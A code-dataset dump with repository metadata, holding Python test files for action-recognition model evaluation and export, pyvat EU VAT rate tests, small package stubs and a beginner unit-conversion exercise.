] | null | null | null | models/action_recognition_2/tests/common/action_recognition_test_case.py | raymondlo84/training_extensions | dc9f45957648d5f9b9ca58c4e62f80e76f5270e9 | [
"Apache-2.0"
] | null | null | null | models/action_recognition_2/tests/common/action_recognition_test_case.py | raymondlo84/training_extensions | dc9f45957648d5f9b9ca58c4e62f80e76f5270e9 | [
"Apache-2.0"
] | null | null | null | """
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import os
import unittest
import torch
import yaml
from ote.utils.misc import download_snapshot_if_not_yet, run_through_shell
def collect_accuracy(path):
accuracies = []
content = '/mean_top1_acc:'
with open(path) as input_stream:
for line in input_stream:
candidate = line.strip()
if content in candidate:
accuracies.append(float(candidate.split(' ')[-1]))
return accuracies
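# A sketch of the log line this parser expects (the prefix before
# '/mean_top1_acc:' is assumed here and may differ between training runs):
#
# "... val/mean_top1_acc: 0.8512"
#
# collect_accuracy() on a log containing such lines yields [0.8512, ...].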
def get_dependencies(template_file):
output = {}
with open(template_file) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
for dependency in content['dependencies']:
output[dependency['destination'].split('.')[0]] = dependency['source']
return output
def create_action_recognition_test_case(problem_name, model_name, ann_file, img_root):
class TestCaseOteApi(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.templates_folder = os.environ['MODEL_TEMPLATES']
cls.template_folder = os.path.join(cls.templates_folder, 'action_recognition_2', problem_name, model_name)
cls.template_file = os.path.join(cls.template_folder, 'template.yaml')
cls.ann_file = ann_file
cls.img_root = img_root
cls.dependencies = get_dependencies(cls.template_file)
download_snapshot_if_not_yet(cls.template_file, cls.template_folder)
run_through_shell(
f'cd {cls.template_folder};'
f'pip install -r requirements.txt;'
)
def skip_if_cpu_is_not_supported(self):
with open(self.template_file) as read_file:
training_targets = [x.lower() for x in yaml.load(read_file, yaml.SafeLoader)['training_target']]
if 'cpu' not in training_targets:
self.skipTest('CPU is not supported.')
@unittest.skipUnless(torch.cuda.is_available(), 'No GPU found')
def test_evaluation_on_gpu(self):
run_through_shell(
f'cd {self.template_folder};'
f'python3 eval.py'
f' --test-ann-files {self.ann_file}'
f' --test-data-roots {self.img_root}'
f' --save-metrics-to metrics.yaml'
f' --load-weights snapshot.pth'
)
with open(os.path.join(self.template_folder, "metrics.yaml")) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
est_accuracy = [metrics['value'] for metrics in content['metrics'] if metrics['key'] == 'accuracy'][0]
with open(f'{os.path.dirname(__file__)}/../expected_outputs/{problem_name}/{model_name}.json') as read_file:
content = json.load(read_file)
ref_accuracy = content['accuracy']
self.assertLess(abs(ref_accuracy - 1e-2 * est_accuracy), 1e-6)
def test_evaluation_on_cpu(self):
self.skip_if_cpu_is_not_supported()
run_through_shell(
'export CUDA_VISIBLE_DEVICES=;'
f'cd {self.template_folder};'
f'python3 eval.py'
f' --test-ann-files {self.ann_file}'
f' --test-data-roots {self.img_root}'
f' --save-metrics-to metrics.yaml'
f' --load-weights snapshot.pth'
)
with open(os.path.join(self.template_folder, "metrics.yaml")) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
est_accuracy = [metrics['value'] for metrics in content['metrics'] if metrics['key'] == 'accuracy'][0]
with open(f'{os.path.dirname(__file__)}/../expected_outputs/{problem_name}/{model_name}.json') as read_file:
content = json.load(read_file)
ref_accuracy = content['accuracy']
self.assertLess(abs(ref_accuracy - 1e-2 * est_accuracy), 1e-6)
@unittest.skipUnless(torch.cuda.is_available(), 'No GPU found')
def test_finetuning_on_gpu(self):
log_file = os.path.join(self.template_folder, 'test_finetuning.log')
run_through_shell(
f'cd {self.template_folder};'
f'python3 train.py'
f' --train-ann-files {self.ann_file}'
f' --train-data-roots {self.img_root}'
f' --val-ann-files {self.ann_file}'
f' --val-data-roots {self.img_root}'
f' --load-weights snapshot.pth'
f' --save-checkpoints-to {self.template_folder}'
f' --gpu-num 1'
f' --batch-size 2'
f' --epochs 6'
f' | tee {log_file}')
accuracy = collect_accuracy(log_file)
self.assertGreater(accuracy[-1], 0.0)
def test_finetuning_on_cpu(self):
self.skip_if_cpu_is_not_supported()
log_file = os.path.join(self.template_folder, 'test_finetuning.log')
run_through_shell(
'export CUDA_VISIBLE_DEVICES=;'
f'cd {self.template_folder};'
f'python3 train.py'
f' --train-ann-files {self.ann_file}'
f' --train-data-roots {self.img_root}'
f' --val-ann-files {self.ann_file}'
f' --val-data-roots {self.img_root}'
f' --load-weights snapshot.pth'
f' --save-checkpoints-to {self.template_folder}'
f' --gpu-num 1'
f' --batch-size 2'
f' --epochs 6'
f' | tee {log_file}')
accuracy = collect_accuracy(log_file)
self.assertGreater(accuracy[-1], 0.0)
return TestCaseOteApi
def create_action_recognition_export_test_case(problem_name, model_name, ann_file, img_root):
class ExportTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.templates_folder = os.environ['MODEL_TEMPLATES']
cls.template_folder = os.path.join(cls.templates_folder, 'action_recognition_2', problem_name, model_name)
cls.template_file = os.path.join(cls.template_folder, 'template.yaml')
cls.ann_file = ann_file
cls.img_root = img_root
cls.dependencies = get_dependencies(cls.template_file)
cls.test_export_thr = 1e-2
download_snapshot_if_not_yet(cls.template_file, cls.template_folder)
run_through_shell(
f'cd {cls.template_folder};'
f'pip install -r requirements.txt;'
)
def skip_if_cpu_is_not_supported(self):
with open(self.template_file) as read_file:
training_targets = [x.lower() for x in yaml.load(read_file, yaml.SafeLoader)['training_target']]
if 'cpu' not in training_targets:
self.skipTest('CPU is not supported.')
def do_export(self, folder):
run_through_shell(
f'cd {os.path.dirname(self.template_file)};'
f'pip install -r requirements.txt;'
f'python3 export.py'
f' --load-weights snapshot.pth'
f' --save-model-to {folder}'
)
def export_test_on_gpu(self, thr):
export_folder = 'gpu_export'
if not os.path.exists(export_folder):
self.do_export(export_folder)
export_dir = os.path.join(self.template_folder, export_folder)
run_through_shell(
f'cd {os.path.dirname(self.template_file)};'
f'python3 eval.py'
f' --test-ann-files {ann_file}'
f' --test-data-roots {img_root}'
f' --load-weights {os.path.join(export_dir, "model.bin")}'
f' --save-metrics-to {os.path.join(export_dir, "metrics.yaml")}'
)
with open(os.path.join(export_dir, "metrics.yaml")) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
est_accuracy = [metric['value'] for metric in content['metrics'] if metric['key'] == 'accuracy'][0]
with open(f'{os.path.dirname(__file__)}/../expected_outputs/{problem_name}/{model_name}.json') as read_file:
content = json.load(read_file)
ref_accuracy = content['accuracy']
self.assertGreater(1e-2 * est_accuracy, ref_accuracy - thr)
def export_test_on_cpu(self, thr):
export_folder = 'cpu_export'
if not os.path.exists(export_folder):
self.do_export(export_folder)
export_dir = os.path.join(self.template_folder, export_folder)
run_through_shell(
f'export CUDA_VISIBLE_DEVICES=;'
f'cd {os.path.dirname(self.template_file)};'
f'python3 eval.py'
f' --test-ann-files {ann_file}'
f' --test-data-roots {img_root}'
f' --load-weights {os.path.join(export_dir, "model.bin")}'
f' --save-metrics-to {os.path.join(export_dir, "metrics.yaml")}'
)
with open(os.path.join(export_dir, "metrics.yaml")) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
est_accuracy = [metric['value'] for metric in content['metrics'] if metric['key'] == 'accuracy'][0]
with open(f'{os.path.dirname(__file__)}/../expected_outputs/{problem_name}/{model_name}.json') as read_file:
content = json.load(read_file)
ref_accuracy = content['accuracy']
self.assertGreater(1e-2 * est_accuracy, ref_accuracy - thr)
@unittest.skipUnless(torch.cuda.is_available(), 'No GPU found')
def test_export_on_gpu(self):
self.export_test_on_gpu(self.test_export_thr)
def test_export_on_cpu(self):
self.skip_if_cpu_is_not_supported()
self.export_test_on_cpu(self.test_export_thr)
return ExportTestCase
| 40.750958 | 120 | 0.596747 | 1,319 | 10,636 | 4.583776 | 0.150114 | 0.02481 | 0.026464 | 0.025306 | 0.798048 | 0.779524 | 0.771254 | 0.765961 | 0.765961 | 0.765961 | 0 | 0.006625 | 0.290429 | 10,636 | 260 | 121 | 40.907692 | 0.794488 | 0.052839 | 0 | 0.734375 | 0 | 0 | 0.25358 | 0.081742 | 0 | 0 | 0 | 0 | 0.03125 | 1 | 0.088542 | false | 0 | 0.03125 | 0 | 0.151042 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7255989dd64b5c650b857ca9a670a259ea51c435 | 26 | py | Python | extract/__init__.py | AndresRubianoM/exportVisualization | 1e2d00542f65f7d45805d1cd5ed44401cb5ebc00 | [
"MIT"
] | null | null | null | extract/__init__.py | AndresRubianoM/exportVisualization | 1e2d00542f65f7d45805d1cd5ed44401cb5ebc00 | [
"MIT"
] | null | null | null | extract/__init__.py | AndresRubianoM/exportVisualization | 1e2d00542f65f7d45805d1cd5ed44401cb5ebc00 | [
"MIT"
] | null | null | null | from .main import dataWits | 26 | 26 | 0.846154 | 4 | 26 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
72a42c91d53a629f37ced63bfb38c7f5b5491953 | 16,531 | py | Python | tests/test_sale_vat_charge.py | jbma/pyvat | 58952f817b0bda38f0594ca8f7baa659ea18ca09 | [
"Apache-2.0"
] | 2 | 2021-10-02T03:16:25.000Z | 2021-12-07T15:12:17.000Z | tests/test_sale_vat_charge.py | jbma/pyvat | 58952f817b0bda38f0594ca8f7baa659ea18ca09 | [
"Apache-2.0"
] | null | null | null | tests/test_sale_vat_charge.py | jbma/pyvat | 58952f817b0bda38f0594ca8f7baa659ea18ca09 | [
"Apache-2.0"
] | null | null | null | import datetime
import pycountry
from decimal import Decimal
from pyvat import (
get_sale_vat_charge,
ItemType,
Party,
VatChargeAction,
)
from pyvat.countries import EU_COUNTRY_CODES
from unittest2 import TestCase
EXPECTED_VAT_RATES = {
'AT': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(10),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'BE': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'BG': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'CY': {
ItemType.generic_physical_good: Decimal(19),
ItemType.generic_electronic_service: Decimal(19),
ItemType.generic_telecommunications_service: Decimal(19),
ItemType.generic_broadcasting_service: Decimal(19),
ItemType.prepaid_broadcasting_service: Decimal(19),
ItemType.ebook: Decimal(19),
ItemType.enewspaper: Decimal(19),
},
'CZ': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'DE': {
ItemType.generic_physical_good: Decimal(19),
ItemType.generic_electronic_service: Decimal(19),
ItemType.generic_telecommunications_service: Decimal(19),
ItemType.generic_broadcasting_service: Decimal(19),
ItemType.prepaid_broadcasting_service: Decimal(19),
ItemType.ebook: Decimal(19),
ItemType.enewspaper: Decimal(19),
},
'DK': {
ItemType.generic_physical_good: Decimal(25),
ItemType.generic_electronic_service: Decimal(25),
ItemType.generic_telecommunications_service: Decimal(25),
ItemType.generic_broadcasting_service: Decimal(25),
ItemType.prepaid_broadcasting_service: Decimal(25),
ItemType.ebook: Decimal(25),
ItemType.enewspaper: Decimal(25),
},
'EE': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'ES': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(4),
ItemType.enewspaper: Decimal(21),
},
'FI': {
ItemType.generic_physical_good: Decimal(24),
ItemType.generic_electronic_service: Decimal(24),
ItemType.generic_telecommunications_service: Decimal(24),
ItemType.generic_broadcasting_service: Decimal(24),
ItemType.prepaid_broadcasting_service: Decimal(24),
ItemType.ebook: Decimal(24),
ItemType.enewspaper: Decimal(24),
},
'FR': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(10),
ItemType.prepaid_broadcasting_service: Decimal(10),
ItemType.ebook: Decimal('5.5'),
ItemType.enewspaper: Decimal('2.1'),
},
'GB': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'GR': {
ItemType.generic_physical_good: Decimal(23),
ItemType.generic_electronic_service: Decimal(23),
ItemType.generic_telecommunications_service: Decimal(23),
ItemType.generic_broadcasting_service: Decimal(23),
ItemType.prepaid_broadcasting_service: Decimal(23),
ItemType.ebook: Decimal(23),
ItemType.enewspaper: Decimal(23),
},
'HR': {
ItemType.generic_physical_good: Decimal(25),
ItemType.generic_electronic_service: Decimal(25),
ItemType.generic_telecommunications_service: Decimal(25),
ItemType.generic_broadcasting_service: Decimal(25),
ItemType.prepaid_broadcasting_service: Decimal(25),
ItemType.ebook: Decimal(25),
ItemType.enewspaper: Decimal(25),
},
'HU': {
ItemType.generic_physical_good: Decimal(27),
ItemType.generic_electronic_service: Decimal(27),
ItemType.generic_telecommunications_service: Decimal(27),
ItemType.generic_broadcasting_service: Decimal(27),
ItemType.prepaid_broadcasting_service: Decimal(27),
ItemType.ebook: Decimal(27),
ItemType.enewspaper: Decimal(27),
},
'IE': {
ItemType.generic_physical_good: Decimal(23),
ItemType.generic_electronic_service: Decimal(23),
ItemType.generic_telecommunications_service: Decimal(23),
ItemType.generic_broadcasting_service: Decimal(23),
ItemType.prepaid_broadcasting_service: Decimal(23),
ItemType.ebook: Decimal(23),
ItemType.enewspaper: Decimal(23),
},
'IT': {
ItemType.generic_physical_good: Decimal(22),
ItemType.generic_electronic_service: Decimal(22),
ItemType.generic_telecommunications_service: Decimal(22),
ItemType.generic_broadcasting_service: Decimal(22),
ItemType.prepaid_broadcasting_service: Decimal(22),
ItemType.ebook: Decimal(22),
ItemType.enewspaper: Decimal(22),
},
'LT': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'LU': {
ItemType.generic_physical_good: Decimal(15),
ItemType.generic_electronic_service: Decimal(15),
ItemType.generic_telecommunications_service: Decimal(15),
ItemType.generic_broadcasting_service: Decimal(3),
ItemType.prepaid_broadcasting_service: Decimal(3),
ItemType.ebook: Decimal(15),
ItemType.enewspaper: Decimal(15),
},
'LV': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'MT': {
ItemType.generic_physical_good: Decimal(18),
ItemType.generic_electronic_service: Decimal(18),
ItemType.generic_telecommunications_service: Decimal(18),
ItemType.generic_broadcasting_service: Decimal(18),
ItemType.prepaid_broadcasting_service: Decimal(18),
ItemType.ebook: Decimal(18),
ItemType.enewspaper: Decimal(18),
},
'NL': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'PL': {
ItemType.generic_physical_good: Decimal(23),
ItemType.generic_electronic_service: Decimal(23),
ItemType.generic_telecommunications_service: Decimal(23),
ItemType.generic_broadcasting_service: Decimal(8),
ItemType.prepaid_broadcasting_service: Decimal(8),
ItemType.ebook: Decimal(23),
ItemType.enewspaper: Decimal(23),
},
'PT': {
ItemType.generic_physical_good: Decimal(23),
ItemType.generic_electronic_service: Decimal(23),
ItemType.generic_telecommunications_service: Decimal(23),
ItemType.generic_broadcasting_service: Decimal(23),
ItemType.prepaid_broadcasting_service: Decimal(23),
ItemType.ebook: Decimal(23),
ItemType.enewspaper: Decimal(23),
},
'RO': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'SE': {
ItemType.generic_physical_good: Decimal(25),
ItemType.generic_electronic_service: Decimal(25),
ItemType.generic_telecommunications_service: Decimal(25),
ItemType.generic_broadcasting_service: Decimal(25),
ItemType.prepaid_broadcasting_service: Decimal(25),
ItemType.ebook: Decimal(25),
ItemType.enewspaper: Decimal(25),
},
'SI': {
ItemType.generic_physical_good: Decimal(22),
ItemType.generic_electronic_service: Decimal(22),
ItemType.generic_telecommunications_service: Decimal(22),
ItemType.generic_broadcasting_service: Decimal(22),
ItemType.prepaid_broadcasting_service: Decimal(22),
ItemType.ebook: Decimal(22),
ItemType.enewspaper: Decimal(22),
},
'SK': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
}
SUPPORTED_ITEM_TYPES = [
ItemType.generic_electronic_service,
ItemType.generic_telecommunications_service,
ItemType.generic_broadcasting_service,
ItemType.prepaid_broadcasting_service,
ItemType.ebook,
ItemType.enewspaper,
]
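
# For reference, a single lookup looks like this (a minimal sketch; the date
# and the two parties are illustrative, not taken from the tests below):
#
#   charge = get_sale_vat_charge(
#       datetime.date(2015, 1, 1),
#       ItemType.generic_electronic_service,
#       Party(country_code='DE', is_business=False),   # buyer
#       Party(country_code='FR', is_business=True),    # seller
#   )
#   # From 2015-01-01 the consumer's country applies, so charge.rate should
#   # match the EXPECTED_VAT_RATES['DE'] entry in the table above.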
class GetSaleVatChargeTestCase(TestCase):
    """Test case for :func:`get_sale_vat_charge`.
    """

    def test_get_sale_vat_charge(self):
        """get_sale_vat_charge(..)
        """
        # EU businesses selling to any type of customer in their own country
        # charge VAT.
        for seller_cc in EU_COUNTRY_CODES:
            for it in SUPPORTED_ITEM_TYPES:
                for d in [datetime.date(2014, 12, 15),
                          datetime.date(2015, 1, 1)]:
                    for buyer_is_business in [True, False]:
                        vat_charge = get_sale_vat_charge(
                            d,
                            it,
                            Party(country_code=seller_cc,
                                  is_business=buyer_is_business),
                            Party(country_code=seller_cc, is_business=True)
                        )
                        self.assertEqual(vat_charge.action,
                                         VatChargeAction.charge)
                        self.assertEqual(vat_charge.rate,
                                         EXPECTED_VAT_RATES[seller_cc][it])
                        self.assertEqual(vat_charge.country_code,
                                         seller_cc)

        # EU businesses selling to businesses in other EU countries apply the
        # reverse-charge mechanism.
        for seller_cc in EU_COUNTRY_CODES:
            for buyer_cc in EU_COUNTRY_CODES:
                if seller_cc == buyer_cc:
                    continue
                for it in SUPPORTED_ITEM_TYPES:
                    for d in [datetime.date(2014, 12, 15),
                              datetime.date(2015, 1, 1)]:
                        vat_charge = get_sale_vat_charge(
                            d,
                            it,
                            Party(country_code=buyer_cc, is_business=True),
                            Party(country_code=seller_cc, is_business=True)
                        )
                        self.assertEqual(vat_charge.action,
                                         VatChargeAction.reverse_charge)
                        self.assertEqual(vat_charge.rate,
                                         Decimal(0))
                        self.assertEqual(vat_charge.country_code,
                                         buyer_cc)

        # EU businesses selling to consumers in other EU countries charge VAT
        # in the country in which the consumer resides after January 1st, 2015.
        for seller_cc in EU_COUNTRY_CODES:
            for buyer_cc in EU_COUNTRY_CODES:
                if seller_cc == buyer_cc:
                    continue
                for it in SUPPORTED_ITEM_TYPES:
                    for d in [datetime.date(2014, 12, 15),
                              datetime.date(2015, 1, 1)]:
                        vat_charge = get_sale_vat_charge(
                            d,
                            it,
                            Party(country_code=buyer_cc, is_business=False),
                            Party(country_code=seller_cc, is_business=True)
                        )
                        self.assertEqual(vat_charge.action,
                                         VatChargeAction.charge)
                        self.assertEqual(
                            vat_charge.rate,
                            EXPECTED_VAT_RATES[buyer_cc][it]
                            if d >= datetime.date(2015, 1, 1) else
                            EXPECTED_VAT_RATES[seller_cc][it]
                        )
                        self.assertEqual(
                            vat_charge.country_code,
                            buyer_cc
                            if d >= datetime.date(2015, 1, 1) else
                            seller_cc
                        )

        # EU businesses selling to customers outside the EU do not charge VAT.
        for seller_cc in EU_COUNTRY_CODES:
            for buyer_country in pycountry.countries:
                buyer_cc = buyer_country.alpha_2
                if buyer_cc in EU_COUNTRY_CODES:
                    continue
                for it in SUPPORTED_ITEM_TYPES:
                    for d in [datetime.date(2014, 12, 15),
                              datetime.date(2015, 1, 1)]:
                        for buyer_is_business in [True, False]:
                            vat_charge = get_sale_vat_charge(
                                d,
                                it,
                                Party(country_code=buyer_cc,
                                      is_business=buyer_is_business),
                                Party(country_code=seller_cc, is_business=True)
                            )
                            self.assertEqual(vat_charge.action,
                                             VatChargeAction.no_charge)
                            self.assertEqual(vat_charge.rate, Decimal(0))
| 43.274869 | 79 | 0.620713 | 1,612 | 16,531 | 6.104218 | 0.083747 | 0.175305 | 0.147967 | 0.094309 | 0.889228 | 0.794106 | 0.785874 | 0.785264 | 0.75874 | 0.749594 | 0 | 0.039597 | 0.29115 | 16,531 | 381 | 80 | 43.388451 | 0.800137 | 0.027887 | 0 | 0.611732 | 0 | 0 | 0.003862 | 0 | 0 | 0 | 0 | 0 | 0.030726 | 1 | 0.002793 | false | 0 | 0.01676 | 0 | 0.022346 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72acdacbf328dc9f2b6e507f1a78162999095cf5 | 96 | py | Python | envi/tests/test_radixtree.py | rnui2k/vivisect | b7b00f2d03defef28b4b8c912e3a8016e956c5f7 | [
"ECL-2.0",
"Apache-2.0"
] | 716 | 2015-01-01T14:41:11.000Z | 2022-03-28T06:51:50.000Z | envi/tests/test_radixtree.py | rnui2k/vivisect | b7b00f2d03defef28b4b8c912e3a8016e956c5f7 | [
"ECL-2.0",
"Apache-2.0"
] | 266 | 2015-01-01T15:07:27.000Z | 2022-03-30T15:19:26.000Z | envi/tests/test_radixtree.py | rnui2k/vivisect | b7b00f2d03defef28b4b8c912e3a8016e956c5f7 | [
"ECL-2.0",
"Apache-2.0"
] | 159 | 2015-01-01T16:19:44.000Z | 2022-03-21T21:55:34.000Z | import unittest
import envi.radixtree as e_tree
class RadixTest(unittest.TestCase):
    pass
| 12 | 35 | 0.78125 | 13 | 96 | 5.692308 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 96 | 7 | 36 | 13.714286 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
f4359a1c6d22a4b88fff79ef1ed663c2ca5bf8f4 | 78 | py | Python | scripts/addons/animation_nodes/data_structures/splines/__init__.py | Tilapiatsu/blender-custom_conf | 05592fedf74e4b7075a6228b8448a5cda10f7753 | [
"MIT"
] | 2 | 2020-04-16T22:12:40.000Z | 2022-01-22T17:18:45.000Z | scripts/addons/animation_nodes/data_structures/splines/__init__.py | Tilapiatsu/blender-custom_conf | 05592fedf74e4b7075a6228b8448a5cda10f7753 | [
"MIT"
] | null | null | null | scripts/addons/animation_nodes/data_structures/splines/__init__.py | Tilapiatsu/blender-custom_conf | 05592fedf74e4b7075a6228b8448a5cda10f7753 | [
"MIT"
] | 2 | 2019-05-16T04:01:09.000Z | 2020-08-25T11:42:26.000Z | from . poly_spline import PolySpline
from . bezier_spline import BezierSpline
| 26 | 40 | 0.846154 | 10 | 78 | 6.4 | 0.7 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 78 | 2 | 41 | 39 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f43cec9f610922118d4ebe6b5b0d68cf63d699b1 | 287 | py | Python | lib/nas_201_api/__init__.py | EM-AutoML/AutoDL-Projects | 8ff416fe5d6cb1b310b885fe376e6f2790fbda14 | [
"MIT"
] | null | null | null | lib/nas_201_api/__init__.py | EM-AutoML/AutoDL-Projects | 8ff416fe5d6cb1b310b885fe376e6f2790fbda14 | [
"MIT"
] | null | null | null | lib/nas_201_api/__init__.py | EM-AutoML/AutoDL-Projects | 8ff416fe5d6cb1b310b885fe376e6f2790fbda14 | [
"MIT"
] | null | null | null | #####################################################
# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2019.08 #
#####################################################
from .api import NASBench201API
from .api import ArchResults, ResultsCount
NAS_BENCH_201_API_VERSION="v1.1" # [2020.02.25]
| 35.875 | 53 | 0.466899 | 29 | 287 | 4.482759 | 0.862069 | 0.107692 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083969 | 0.087108 | 287 | 7 | 54 | 41 | 0.412214 | 0.219512 | 0 | 0 | 0 | 0 | 0.035088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f468d07eee0b28b73efe9620a73217c2766b78a0 | 311 | py | Python | ex008.py | EwertonRosendo/PastaDeExercicios | 68d23194b87ce1c8405c70fcceb3378955815d7d | [
"MIT"
] | null | null | null | ex008.py | EwertonRosendo/PastaDeExercicios | 68d23194b87ce1c8405c70fcceb3378955815d7d | [
"MIT"
] | null | null | null | ex008.py | EwertonRosendo/PastaDeExercicios | 68d23194b87ce1c8405c70fcceb3378955815d7d | [
"MIT"
] | null | null | null | n = int(input("escreva um numero em metros que será convertido para centimetros e milimetros"))
